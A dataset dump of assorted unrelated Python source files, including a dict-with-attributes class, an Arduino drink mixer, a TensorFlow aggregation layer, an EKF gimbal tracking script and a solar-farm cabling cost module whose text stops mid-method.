content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
from typing import get_type_hints, TypeVar, Type
__all__ = ["Storage"]
T = TypeVar('T')
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = Storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError as k:
raise AttributeError(k)
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError as k:
raise AttributeError(k)
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
def __sub__(self, other):
if isinstance(other, str):
if other in self:
del self[other]
else:
for key in other:
self.__sub__(key)
return self
@staticmethod
def type_hints(cls: Type) -> 'Storage':
result = Storage()
for prop_name, prop_type in get_type_hints(cls).items():
if prop_name[0] != '_':
result[prop_name] = prop_type
else:
pub_name = prop_name[1:]
if isinstance(getattr(cls, pub_name, None), property):
result[pub_name] = prop_type
return result
@staticmethod
def of(obj) -> 'Storage':
result = Storage()
for name in get_type_hints(obj).keys():
if name[0] == '_':
name = name[1:]
if hasattr(obj, name):
result[name] = getattr(obj, name)
return result
def to(self, cls: Type[T]) -> T:
obj = cls()
for key, val in self.items():
setattr(obj, key, val)
return obj
| python |
from libarduino import pinMode,digitalWrite,analogRead
import time
class Actuator():
def __init__(self, port):
self.port = port
pinMode(self.port, 'OUTPUT')
def activate(self):
digitalWrite(self.port, 1)
def deactivate(self):
digitalWrite(self.port, 0)
class Ranger():
def __init__(self, port, drink):
self.port = port
self.drink = drink
def read(self):
return analogRead(self.port)
class Mixer():
def __init__(self, motor, piston, rangers, valves, capacity=250, drinks=2, dist=128):
self.motor = motor
self.piston = piston
self.rangers = rangers
self.valves = valves
self.capacity = capacity
self.drinks = drinks
self.dist = dist
def mix_drink(self,recipe):
use = [] # Use these liquids.
for i in range(self.drinks):
if recipe[i] > 0:
use.append(i)
for i in use:
while self.rangers[i].read() > self.dist:
self.motor.activate()
time.sleep(0.1)
self.motor.deactivate()
start_time = time.time()
self.valves[i].activate()
const = 1 # Const is the relation between time and how much liquid which gets through the valves. TODO find proper const.
fill_time = recipe[i] * self.capacity * const
while (time.time() - start_time) < fill_time:
print 'Standing still'
self.valves[i].deactivate()
def serve(self,piston_time=7,ranger=0):
# Get to piston position
while self.rangers[ranger].read() > self.dist:
self.motor.activate()
time.sleep(0.1)
start_time = time.time()
self.piston.activate()
while (time.time() - start_time) < piston_time:
print 'Serving drink'
self.piston.deactivate()
| python |
from django import forms
class CartAddForm(forms.Form):
quantity = forms.IntegerField(min_value=1, max_value=9) | python |
#!/usr/bin/python
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Converts a JSON file to a MATLAB .mat file.
Usage: json_to_mat.py foo.json
"""
import collections
import json
import os
import sys
import scipy.io
def _Sanitize(data):
"""Converts data to a format acceptable by scipy.io.savemat.
The scipy.io.savemat function cannot handle Booleans, NoneTypes, or
unicode strings.
Args:
data: Dictionary returned by json.load.
Returns:
Sanitized dictionary that is compatible with scipy.io.savemat.
"""
if isinstance(data, collections.OrderedDict):
return collections.OrderedDict([(str(k), _Sanitize(v))
for k, v in data.items()])
if isinstance(data, dict):
return {str(k): _Sanitize(v) for k, v in data.items()}
elif isinstance(data, list):
return [_Sanitize(x) for x in data]
elif data is None:
return []
elif isinstance(data, bool):
return 1 if data else 0
else:
return data
def _PrintUsage():
print
print 'Usage: json_to_mat.py foo.json'
print
def main(argv):
if len(argv) != 2:
print 'Error: Wrong number of arguments.'
_PrintUsage()
sys.exit(1)
if not os.path.isfile(argv[1]):
print 'Error: File does not exist.'
_PrintUsage()
sys.exit(1)
with open(argv[1], 'r') as f:
data = _Sanitize(json.load(f, object_pairs_hook=collections.OrderedDict))
filename, _ = os.path.splitext(argv[1])
scipy.io.savemat(filename + '.mat', data, long_field_names=True)
if __name__ == '__main__':
main(sys.argv)
| python |
#-*- coding: utf-8 -*-
__all__ = ['LEA','ECB','CBC','CTR','CFB','OFB','CCM','GCM','CMAC']
from .LEA import LEA
from .ECB import ECB
from .CBC import CBC
from .CTR import CTR
from .CFB import CFB
from .OFB import OFB
from .CCM import CCM
from .GCM import GCM
from .CMAC import CMAC
from .CipherMode import CipherMode, ENCRYPT_MODE, DECRYPT_MODE
from .CipherMode import TagError
| python |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Layer which represents aggregation function.
See class level comment.
This layer applies the provided model to the ragged input tensor and aggregates
the results.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow import keras
class Aggregation(keras.layers.Layer):
# pyformat: disable
"""Layer which represents an aggregation function.
Calls the model on each of the ragged dimensions and takes the mean.
Input shape:
A list or dictionary with num_input_dims Rank-2 ragged tensors with
shape: (batch_size, ?)
Output shape:
Rank-2 tensor with shape: (batch_size, 1)
Attributes:
- All `__init__ `arguments.
Example:
```python
model = tf.keras.Model(inputs=inputs, outputs=outputs)
layer = tfl.layers.Aggregation(model)
```
"""
# pyformat: enable
def __init__(self, model, **kwargs):
"""initializes an instance of `Aggregation`.
Args:
model: A tf.keras.Model instance.
**kwargs: Other args passed to `tf.keras.layers.Layer` initializer.
Raises:
ValueError: if model is not at `tf.keras.Model` instance.
"""
if not isinstance(model, tf.keras.Model):
raise ValueError('Model must be a tf.keras.Model instance.')
super(Aggregation, self).__init__(**kwargs)
# This flag enables inputs to be Ragged Tensors
self._supports_ragged_inputs = True
self.model = model
def call(self, x):
"""Standard Keras call() method."""
return tf.reduce_mean(tf.ragged.map_flat_values(self.model, x), axis=1)
def get_config(self):
"""Standard Keras get_config() method."""
config = super(Aggregation, self).get_config().copy()
config.update({'model': tf.keras.utils.serialize_keras_object(self.model)})
return config
@classmethod
def from_config(cls, config, custom_objects=None):
model = tf.keras.utils.deserialize_keras_object(
config.pop('model'), custom_objects=custom_objects)
return cls(model, **config)
| python |
#This file contains a common EKF tracking code for both elevator and rover
#It checks variable from file config.npy to figure out its own type
import time
from datetime import datetime
import subprocess
import numpy as np
from numpy import linalg
from numpy.linalg import inv
import math
import cmath
import linalgfunc
import pdb
import os
import serial
import sys, glob
import random
import Adafruit_BBIO.GPIO as GPIO
import pickle
#Libraries made for convenience
from analog import Analog
from motion_tracking_socket3D import MotionTrackingSocket3D
from led import LED
from trigger_socket import TriggerSocket
from motor_system import MotorSystem
import my_functions as mf
def initialize():
global num_iteration
num_iteration = 200
global A
A = np.identity(3)
global I
I = np.identity(3)
global B
B = np.matrix([[0,0],[1,0],[0,1]])
global Q
Q = np.matrix([[0.00001,0,0],[0,0.0005,0],[0,0,0.0005]])
global Q_scaling
Q_scaling = 1000000
global R
R = 1
global P_f
P_f = np.matrix([[0.100,0,0],[0,0.50,0],[0,0,0.50]])
global P
P = P_f
global scan_parameters_all
scan_parameters_all = np.zeros((num_iteration,6))
global x_hatf_all
x_hatf_all = np.zeros((num_iteration,3))
global x_hat_all
x_hat_all = np.zeros((num_iteration,3))
global x_I_hat_all
x_hat_all = np.zeros((num_iteration,3))
global y_hat_all
y_hat_all = np.zeros(num_iteration)
global y_all
y_all = np.zeros(num_iteration)
global eigP_all
eigP_all = np.zeros(num_iteration)
global Pf_all
Pf_all = np.zeros((num_iteration,3,3))
global P_all
P_all = np.zeros((num_iteration,3,3))
global C_all
C_all = np.zeros((num_iteration,3))
global K_all
K_all = np.zeros((num_iteration,3))
global u_all
u_all = np.zeros((num_iteration,3))
global motor_commands_all
motor_commands_all = np.zeros((num_iteration,2))
global x_ground_truth_all
x_ground_truth_all = np.zeros((num_iteration,6))
global time_all
time_all = np.zeros(num_iteration)
def setup():
global receiver
receiver = Analog()
global Gimbal
Gimbal = MotorSystem()
Gimbal.TakeGroundPosition()
global motion_socket
motion_socket = MotionTrackingSocket3D()
global MyRobotName
MyRobotName = mf.read_file("my_type.txt").split()[0]
global scan_alternation_flag
global c
if MyRobotName == 'Rover':
initial_pitch = 7
initial_yaw = 7
scan_alternation_flag = 1
c = 15
from underlying_robot import Robot
global myBot
myBot = Robot(motion_socket,MyRobotName,3,0.6)
elif MyRobotName == 'Elevator':
initial_pitch = 6
initial_yaw = -8
scan_alternation_flag = 0
c = 15
MyRobotName2 = mf.read_file("my_name.txt").split()[0]
local_config_file_name = MyRobotName2 + '_config.txt'
s = mf.read_file(local_config_file_name)
local_config = s.split(' ')
global bias_angle
bias_angle = float(local_config[8])
global receiver_sum_angle
global base_sum_angle
receiver_sum_angle = initial_pitch
base_sum_angle = initial_yaw
global communication_flag
communication_flag = int(mf.read_file("communication_flag.txt"))
if communication_flag == 0:
global txLED
txLED = LED()
txLED.on()
else:
from receiver_handle import ReceiverHandle
global RxRoutine
RxRoutine = ReceiverHandle(scan[1])
global TxRoutine
TxRoutine = TransmissionHandle()
yaw1 = Gimbal.get_yaw()
x = motion_socket.x
if bias_angle == 180:
yaw2 = x[0]%360-180
else:
yaw2 = x[0]
#pdb.set_trace()
if abs(yaw1-yaw2)>1.0:
motion_socket.stop()
Gimbal.Deactivate()
txLED.off()
pdb.set_trace()
raise Exception("Sorry, the robot is not aligned, please correct the orientation: ",yaw2)
Gimbal.WriteAbsoluteAngles([initial_yaw,initial_pitch])
x = motion_socket.x
pitch = Gimbal.get_pitch()
yaw = Gimbal.get_yaw()
print('Reached absolute yaw at ',yaw,' degrees, and absolute pitch at ',pitch,' degrees')
if bias_angle == 180:
yaw = x[0]%360-180
else:
yaw = x[0]
print('From Motion Tracking System yaw = ',yaw,' and pitch = ',x[1])
def trigger_setup():
current_time = time.time()
print("Current time: %f" %(current_time))
global my_trigger
my_trigger = TriggerSocket()
print("Waiting for the starting trigger on ", MyRobotName)
global t_START
t_START, duty, tIdle= my_trigger.waitForTrigger()
mf.wait_till(t_START+3)
global toc
toc = time.time()
print("Process triggered at time ",datetime.fromtimestamp(toc).strftime('%Y %m %d_%I:%M:%S.%f %p'), ' on ', MyRobotName)
if MyRobotName == 'Rover':
myBot.duty = duty
myBot.idle_time = tIdle
myBot.motion_state = True
def closing_setup():
Gimbal.Deactivate()
file_name = MyRobotName + '_3D_EKF_data'
txt_file_name = file_name + '_recent_files_name.txt'
zip_name = file_name + datetime.fromtimestamp(toc).strftime('_%Y-%m-%d_%I:%M_%p.npz')
received_data_pkl_file_name = file_name + '_received_data' + datetime.fromtimestamp(toc).strftime('_%Y-%m-%d_%I:%M_%p.pkl')
iteration_num_pkl_file_name = file_name + '_iteration_nums'+ datetime.fromtimestamp(toc).strftime('_%Y-%m-%d_%I:%M_%p.pkl')
file2write = open(txt_file_name,'w')
file2write.write(zip_name + ' ')
if communication_flag == 0:
txLED.off()
else:
RxRoutine.stop()
TxRoutine.deactivate_transmission()
file2write.write(received_data_pkl_file_name + ' ')
file2write.write(iteration_num_pkl_file_name)
iteration_nums = RxRoutine.iteration_nums
received_data = RxRoutine.received_data
#np.save('recent_file_name.npy',common_file_name)
f = open(iteration_num_pkl_file_name,"wb")
pickle.dump(iteration_nums,f)
f.close()
f = open(received_data_pkl_file_name,"wb")
pickle.dump(received_data,f)
f.close()
file2write.close()
np.savez(zip_name, scan_parameters_all=scan_parameters_all, \
x_hatf_all=x_hatf_all, x_hat_all=x_hat, Pf_all=Pf_all,\
C_all=C_all, y_hat_all=y_hat_all,\
y_all=y_all, P_all=P_all, K_all=K_all, timer=timer,interval = interval,\
u_all=u_all, scan_psi_all=scan_psi,scan_theta_all=scan_theta, \
motor_commands_all=motor_commands_all, x_ground_truth_all=x_ground_truth_all,theta_all = theta)
message = MyRobotName+" is Done!"
my_trigger.sendFinisherFlag(message.encode())
my_trigger.Deactivate()
if MyRobotName == 'Rover':
myBot.takeGroundPosition()
motion_socket.stop()
initialize()
setup()
x_ground_truth_all[0] = motion_socket.x
#Variables Initialization
diff_sum = 0
x_hat = np.zeros((num_iteration,3))
comm_array = np.zeros(7)
x_hat[0,:] = [0.5,0,0]
x_hat_k_f = [0.5,0,0]
x_I_hat = np.zeros((num_iteration,3))
x_I_hat[0,:] = x_hat[0,:]
x_hatf_all[0,:] = x_hat[0,:]
x_I_hat_k = x_hat_k_f
x_hat_k_p = x_hat_k_f
y_hat = 0
K = np.identity(3)
C = np.identity(3)
y = 0
u2 = 0
u3 = 0
u = [0,u2,u3]
psi = np.zeros(num_iteration+1)
timer = np.zeros(num_iteration+1)
theta = np.zeros(num_iteration+1)
scan_psi = np.zeros(num_iteration+1)
scan_theta = np.zeros(num_iteration+1)
difference = np.zeros(num_iteration+1)
angle_bias = np.zeros(num_iteration+1)
difference[0] = 0.5
theta[0] = Gimbal.get_pitch()
scan_theta[0] = theta[0]
# ReceiverStepper.rotateMotor(-theta[0])
# receiver_sum_angle = receiver_sum_angle -theta[0]
interval = np.zeros(num_iteration)
disturbance = 1 #degree/second
T = 0.8
T_factor = 2 #assuming 2.5 seconds for the full circle
t_Iter = 0.5 #assigned time for 1 step
switch = 0
#scanning terms
phi = 120
scan_radius = 4
radius = 4
bias = angle_bias[0]
k_factor = 360/phi
scan_counter = (360/phi)*scan_alternation_flag-1
pause_flag = 0
active_phase = 0
alpha_bias = 0
beta_bias = 0
Motor_command_receiver = 0
Motor_command_base = 0
termination_flag =1
is_moving = 0
if(is_moving == 0):
min_radius = 2
else:
min_radius = 4
max_radius = 6
Vmax = 0.0
trigger_setup()
x_ground_truth_all[0] = motion_socket.x
set_time = t_START + t_Iter +3
tdiff_min = 1000
for i in range(1,num_iteration):
#print 'i= %d' %(i)
#u = [0,0,0]
Gimbal.ApplyMotorCommandsSync([Motor_command_base, Motor_command_receiver])
y = receiver.getIntensity()
theta[i] = Gimbal.get_pitch()
if y>Vmax:
Vmax = y
x_hat_k_f = x_hat[i-1,:] + [0,u2,u3]
y_hat,C = mf.get_output_and_jacobian(alpha_bias,beta_bias,x_hat_k_f,c)
#pdb.set_trace()
if(active_phase == 1 and termination_flag == 1):
P_f = A*P*A + Q_scaling*Q
#Filtering
K = P_f*np.transpose(C)*linalg.inv(C*P_f*np.transpose(C) + R)
x_hat_k_p = np.array(np.mat(x_hat_k_f).T+K*(y-y_hat)).T[0] #0 is added to make it a one dimensional array rather a 2D array
if x_hat_k_p[0] < 0:
x_hat_k_p[0] = 0
x_I_hat_k = x_I_hat[i-1,:] + x_hat_k_p*interval[i-1]
P = (np.identity(3) - K*C)*P_f
difference[i] = abs((y-y_hat)/y)
min_ind = max(i-2,0)
diff_sum = sum(difference[min_ind:i+1])/3
if(diff_sum < 0.5):
G = 0.98*pause_flag
Gi = 0.2*pause_flag
else:
G = 0
Gi = 0
u2 = -G*x_hat_k_p[1] - Gi*x_I_hat_k[1]
u3 = -G*x_hat_k_p[2] - Gi*x_I_hat_k[2]
else:
P_f_partial = A[0,0]*P[0,0]*A[0,0] + Q_scaling*Q[0,0]
P_f[0,0] = P_f_partial
K = P_f_partial*(C[0,0])/(C[0,0]*P_f_partial*C[0,0] + R)
x_hat_k_p[0] = x_hat_k_f[0]+K*(y-y_hat)
x_I_hat_k = [0,0,0]
x_I_hat_k[0] = x_I_hat[i-1,0] + x_hat_k_p[0]*interval[i-1]
P[0,0] = (1 - K*C[0,0])*P_f_partial
u2 = 0
u3 = 0
u = [0,u2,u3]
#print 'normal_u2 %f, normal_u3 %f' %(normal_u2, normal_u3)
P_all[i,:,:] = P
x_hatf_all[i,:] = x_hat_k_f
scan_parameters_all[i,:] = [beta_bias,alpha_bias, scan_counter, active_phase, pause_flag, scan_radius]
C_all[i,:] = C
Pf_all[i,:,:] = P_f
y_all[i] = y
y_hat_all[i] = y_hat
K_all[i,:] = np.transpose(K)
x_I_hat[i,:] = x_I_hat_k
x_hat[i,:] = x_hat_k_p
u_all[i,:] = u
motor_commands_all[i] = [Motor_command_base,Motor_command_receiver]
toc = time.time()
timer[i] = toc-t_START
interval[i] = timer[i] - timer[i-1]
if(i>0):
T = sum(interval[1:i+1])/i
comm_array[0] = i
comm_array[1] = timer[i]
comm_array[2] = x_hat[i,0]
comm_array[3] = x_hat[i,1]
comm_array[4] = x_hat[i,2]
comm_array[5] = y
comm_array[6] = y_hat
#np.save(npy_name,comm_array)
#sftp.put(npy_name,remote_path + npy_name)
previous_alpha_bias = scan_radius*mf.sind(bias)
previous_beta_bias = scan_radius*mf.cosd(bias)
P_angles = P[1:3,1:3]
V = np.linalg.eig(P_angles)[0] #Eigen vectors
eigP_all[i] = max(V) #Max eigen vector
scan_counter = scan_counter%(2*k_factor) + 1
if(scan_counter == 1):
pause_flag = 1
if(y < 0.5*Vmax):
termination_flag = 1
if(scan_counter == k_factor+1):
pause_flag = 0
if(scan_counter == 2*k_factor):
active_phase = 1
if(scan_counter == k_factor+1):
active_phase = 0
if(i>20): #After this it becomes adaptive
min_ind = int(max(i-k_factor,0))
e = sum(eigP_all[min_ind:i])/k_factor
#radius = (min(20,max(min_radius, math.floor((e)/200)))+radius)/2
radius = min(max_radius,max(min_radius, math.floor((e)/6000)))
if((radius == 0) and (y > 7*Vmax)):
print("Reached terminal condition!!!")
termination_flag = 0 + is_moving #It will only be zero when is moving is false
scan_radius = pause_flag*radius*termination_flag
#Computing scanning parameters for the next iteration
angle_bias[i+1] = (scan_counter-1)*phi
bias = angle_bias[i+1]
alpha_bias = scan_radius*mf.sind(bias)
beta_bias = scan_radius*mf.cosd(bias)
motor_commands =mf.generate_motor_commands_old(theta[i], previous_alpha_bias,previous_beta_bias, u, alpha_bias, beta_bias)
Motor_command_base = motor_commands[0,0]
Motor_command_receiver = motor_commands[0,1]
base_sum_angle = base_sum_angle + Motor_command_base
receiver_sum_angle = receiver_sum_angle + Motor_command_receiver
#theta[i+1] = receiver_sum_angle
time_all[i] = set_time-t_START
tDiff= mf.wait_till(set_time)
if tDiff<tdiff_min:
tdiff_min = tDiff
#print "Iteration: %d, Scan_radius: %d, Angle %d" %(i,scan_radius,bias)
x_ground_truth_all[i] = motion_socket.x
set_time = set_time + t_Iter
# sys.stdout.write("Iteration: %d / %d \r" % (i,num_iteration) )
# #sys.stdout.write("Measurements: %f / %f \r" % (y,Vmax) )
# sys.stdout.flush()
print("Iteration: %d / %d \r" % (i,num_iteration) )
if bias_angle == 180:
yaw = x_ground_truth_all[i,0]%360-180
else:
yaw = x_ground_truth_all[i,0]
print('From Motion Tracking System yaw = ',yaw,' and pitch = ',x_ground_truth_all[i,1], ' tDiff ',tDiff)
print('Minimum wait was: ',tdiff_min)
closing_setup()
print('Done!')
| python |
from Jumpscale import j
class Nodes:
def __init__(self, session, url):
self._session = session
self._base_url = url
j.data.schema.add_from_path(
"/sandbox/code/github/threefoldtech/jumpscaleX_threebot/ThreeBotPackages/tfgrid/directory/models"
)
self._model = j.data.schema.get_from_url("tfgrid.directory.node.2")
def list(self, farm_id=None, country=None, city=None, cru=None, sru=None, mru=None, hru=None, proofs=False):
query = {}
if proofs:
query["proofs"] = "true"
args = {
"farm": farm_id,
"city": city,
"cru": cru,
"sru": sru,
"mru": mru,
"hru": hru,
}
for k, v in args.items():
if v is not None:
query[k] = v
resp = self._session.get(self._base_url + "/nodes", params=query)
nodes = []
for node_data in resp.json():
node = self._model.new(datadict=node_data)
nodes.append(node)
return nodes
def get(self, node_id, proofs=False):
params = {}
if proofs:
params["proofs"] = "true"
resp = self._session.get(self._base_url + f"/nodes/{node_id}", params=params)
return self._model.new(datadict=resp.json())
| python |
#!/usr/bin/env python
#
# Copyright (c) 2019 Opticks Team. All Rights Reserved.
#
# This file is part of Opticks
# (see https://bitbucket.org/simoncblyth/opticks).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
For grabbing ggv arguments for checking
"""
import numpy as np
from env.numerics.npy.prism import Prism, Box
import argparse
def parse_args():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--save", action="store_true", default=False )
parser.add_argument("--test", action="store_true", default=False )
parser.add_argument("--torch", action="store_true", default=False )
parser.add_argument("--tag", default="" )
parser.add_argument("--testconfig", default="" )
parser.add_argument("--torchconfig", default="" )
parser.add_argument("--animtimemax", default=100 )
args = parser.parse_args()
return args
kv_ = lambda s:map(lambda _:_.split("="),s.split("_"))
class Torch(object):
def __init__(self, config):
self.config = kv_(config)
self.source = None
self.target = None
for k,v in self.config:
if k == "source":
self.source = np.fromstring(v, sep=",")
elif k == "target":
self.target = np.fromstring(v, sep=",")
else:
pass
pass
pass
self.direction = self.target - self.source
def __repr__(self):
return "\n".join([
"source %25s " % self.source,
"target %25s " % self.target,
"direction %25s " % self.direction
])
def __str__(self):
return "\n".join(["%20s : %s " % (k,v) for k,v in self.config])
class Test(object):
def __init__(self, config):
self.config = kv_(config)
shapes = []
boundaries = []
parameters = []
for k,v in self.config:
if k == "shape":
shapes.append(v)
elif k == "boundary":
boundaries.append(v)
elif k == "parameters":
parameters.append(v)
else:
pass
assert len(shapes) == len(boundaries) == len(parameters)
self.shapes = []
for i in range(len(shapes)):
shape = None
if shapes[i] == "box":
shape = Box(parameters[i], boundaries[i])
elif shapes[i] == "prism":
shape = Prism(parameters[i], boundaries[i])
else:
assert 0
pass
self.shapes.append(shape)
def __str__(self):
return "\n".join(map(str, self.shapes))
def __repr__(self):
return "\n".join(["%20s : %s " % (k,v) for k,v in self.config])
if __name__ == '__main__':
#print "\n".join(sys.argv)
args = parse_args()
torch = Torch(args.torchconfig)
test = Test(args.testconfig)
sh = test.shapes[-1]
print "torch:\n", torch
print repr(torch)
print "test:\n", test
print "sh:\n", sh
| python |
class Frame:
def __init__(self, size):
self.type = None # whether this is an audio/video frame
self.data = None # this is the raw frame data
self.codec = None # codec
self.time_stamp = 0 # TS of the frame
self.size = size
class AudioFrame(Frame):
def __init__(self):
return super().__init__()
class VideoFrame(Frame):
def __init__(self, size, reader):
super().__init__(size)
self.data = reader.readn(size)
| python |
import traceback
import math
import numpy as np
import pandas as pd
from .CostModule import CostModule
class CollectionCost(CostModule):
"""
Assumptions:
1. System contains central inverters of 1 MW rating each. The inverter being
considered is a containerized solution which includes a co-located LV/MV
transformer.
2. PV array is rectangular in design, with an aspect ratio of 1.5:1::L:W
3. Trench for buried cables from each string inverter runs along the perimeter
of the system, and up till the combiner box placed at one of the 4 corners of the
array.
Shown below is a crude visualization of solar farm floor-plan considered in
SolarBOSSE. As mentioned above, the aspect ratio of this solar farm is assumed
to be 1.5:1::L:W. This is a simple, over-generalization of-course, given that it
is the 1st version of SolarBOSSE (v.1.0.0). This model is being designed in such
a way that any future interest to allow the user design project layout will be
possible.
Key:
||| - 3 phase HV power cables (gen-tie)
|| - main project road; assumed to have 20+ ton bearing capacity. Also contains
trench along both sides of the road for output circuit cables (DC), as well
as MV power cables from each inverter station going all the way to the
substation.
=== - horizontal road running across the width of project land. Assumed to be of
lower quality than the main project road, and not meant to support cranes.
Smaller maintenance vehicles (like Ford F-150 permissible).
[gen-tie to utility substation/point of interconnection]
|||
|||
|||
|||
________ |||
_____________|inverter|__|||____
| ||-------| |
| || |substation|
| || | |
| || |__________|
| || |
| || |
| ||________ |
| ||inverter| |
|============||==================|
| || |
| || |
| || |
| || |
| || |
| || |
| ||________ |
| ||inverter| |
|============||==================|
| || |
| || |
| || |
| || |
| || |
| ||________ |
| ||inverter| |
|============||==================|
| || |
| || |
| || |
| || |
| || |
|____________||__________________|
Module to calculate:
1. Wiring requirements of system. This includes:
a. Source circuit cabling (from string to combiner box located at end of each
row). The combiner box capacity (number of strings per box) is a user input.
b. Output circuit; from each combiner box to that string's inverter station.
c. Power cable home run; from inverter/transformer station (where it is
transformed to MV) to the plant's substation which is located at the long end
of the plant.
"""
def __init__(self, input_dict, output_dict, project_name):
super(CollectionCost, self).__init__(input_dict, output_dict, project_name)
self.input_dict = input_dict
self.output_dict = output_dict
self.project_name = project_name
self.m2_per_acre = 4046.86
self.inch_to_m = 0.0254
self.m_to_lf = 3.28084
self._km_to_LF = 3.28084 * 1000
# Max allowable voltage drop (VD%) in circuits
self.allowable_vd_percent = 3 / 100
# Specific resistivity of copper between 25 and 50 deg C:
self.Cu_specific_resistivity = 11
def land_dimensions(self):
"""
Given user defined project area, and assumed aspect ratio of 1.5:1, calculate
solar farm's length and width (in m)
"""
land_area_acres = self.input_dict['site_prep_area_acres']
land_area_m2 = land_area_acres * self.m2_per_acre
# Determine width & length of project land respectively:
land_width_m = (land_area_m2 / 1.5) ** 0.5
self.output_dict['land_width_m'] = land_width_m
land_length_m = 1.5 * land_width_m
return land_length_m, land_width_m
def get_quadrant_dimensions(self):
"""
1 inverter for every 1 MW_DC worth of panels. Super imposing the project layout
on a cartesian plane, the main project road (along the long edge of the land)
is at x = 0. And the souther most part of the project land is at y = 0. The
area covering each unit MW_DC worth of land will be referred to as a quadrant.
y
|
|
(-x) ------|----- x
|
|
(-y)
"""
# Get length and width of each quadrant:
land_area_acres = self.input_dict['site_prep_area_acres_mw_dc']
land_area_per_inverter_acres = land_area_acres * \
(self.input_dict['inverter_rating_kW'] / 1000)
land_area_m2 = land_area_per_inverter_acres * self.m2_per_acre
# Determine width & length of project land respectively:
land_width_m = self.output_dict['land_width_m']
subarray_width_m = land_width_m / 2
self.output_dict['subarray_width_m'] = subarray_width_m
land_length_m = land_area_m2 / land_width_m
return land_length_m, land_width_m
def inverter_list(self):
"""
Return a tuple of inverters in the project
"""
# Get number of inverters in the project
# dividing by 150 because that's the upper limit on the size of 1 region.
# Where 1 region is the max size of PV array that the collection module
# runs for. If the project size is greater than size of region,
# SolarBOSSE runs the collection cost module
# (floor(project_size / region) + 1) times.
if self.input_dict['system_size_MW_DC'] > 150:
number_of_inverters = 150
else:
number_of_inverters = self.input_dict['system_size_MW_DC']
inverter_list = [n for n in range(round(number_of_inverters))]
self.output_dict['inverter_list'] = inverter_list
return inverter_list
def number_panels_along_x(self):
"""
Assuming portrait orientation of modules, with 2 modules stacked end-to-end.
"""
subarray_width_m = self.output_dict['subarray_width_m']
# Adding 1 inch for mid clamp:
panel_width_m = self.input_dict['module_width_m'] + self.inch_to_m
number_panels_along_x = math.floor(subarray_width_m / panel_width_m)
return number_panels_along_x
def number_rows_per_subquadrant(self):
"""
2 sub-quadrants per quadrant; one sub-quadrant on either side of the main
project road. 2 sub arrays per quadrant; accordingly, 1 sub-array per
sub-quadrant. And each sub-quadrant is rated for half of quadrant's DC
rating.
"""
module_rating_W = self.input_dict['module_rating_W']
# multiplied by 2 since 2 modules end-to-end in portrait orientation
single_row_rating_W = 2 * self.number_panels_along_x() * module_rating_W
# Since each quadrant is sized according to inverter rating (DC)
inverter_rating_W = self.input_dict['inverter_rating_kW'] * 1000 * \
self.input_dict['dc_ac_ratio']
num_rows_sub_quadrant = math.floor((inverter_rating_W / 2) / single_row_rating_W)
return num_rows_sub_quadrant
def number_modules_per_string(self):
"""
Calculate number of modules per string based on module V_oc and inverter max
MPPT DC voltage
"""
number_modules_per_string = math.floor(self.input_dict['inverter_max_mppt_V_DC'] /
self.input_dict['module_V_oc'])
# string open circuit voltage (used later in VD% calculations):
self.output_dict['string_V_oc'] = number_modules_per_string * \
self.input_dict['module_V_oc']
return number_modules_per_string
def num_strings_per_row(self):
"""
Combined number of strings from both sub rows
"""
number_panels_along_x = self.number_panels_along_x()
# Multiplying by 2 since there are 2 sub rows per row
num_strings_per_row = 2 * math.floor(number_panels_along_x /
self.number_modules_per_string())
return num_strings_per_row
def distance_to_combiner_box(self, number_of_strings):
"""
Cumulative distance to combiner box at end of each row for all strings in a
row. Note that this is only the cumulative length of source circuits for 1 of
the 2 sub rows in a row. Remember that each row has 2 panels in portrait
orientation stacked end-to-end. Multiply result obtained form this method by
2 to get total cumulative length of source circuit wire for entire row.
"""
distance_to_combiner_box = 0 # initialize
number_modules_per_string = self.number_modules_per_string()
# Get module length (plus 1" width of mid clamp):
module_width_m = self.input_dict['module_width_m'] + self.inch_to_m
number_of_strings_per_sub_row = int(number_of_strings / 2)
for i in range(number_of_strings_per_sub_row):
if 0 == i:
# Distance of terminal module in 1st string from combiner box:
distance_to_combiner_box = (i + 1) * module_width_m * \
number_modules_per_string
adder = distance_to_combiner_box + module_width_m
else:
# Where adder is the first module in subsequent strings
distance_to_combiner_box += adder + ((i + 1) * module_width_m *
number_modules_per_string)
adder = ((i + 1) * module_width_m * number_modules_per_string) + \
module_width_m
return distance_to_combiner_box
def source_circuit_wire_length_lf(self,
num_strings_per_row,
number_rows_per_subquadrant):
"""
Determine total source circuit wire length for each quadrant
"""
distance_to_combiner_box_per_row = \
self.distance_to_combiner_box(num_strings_per_row)
# Multiply by 2 since there are 2 sets of rows in a quadrant:
source_circuit_wire_length_m = distance_to_combiner_box_per_row * \
number_rows_per_subquadrant * 2
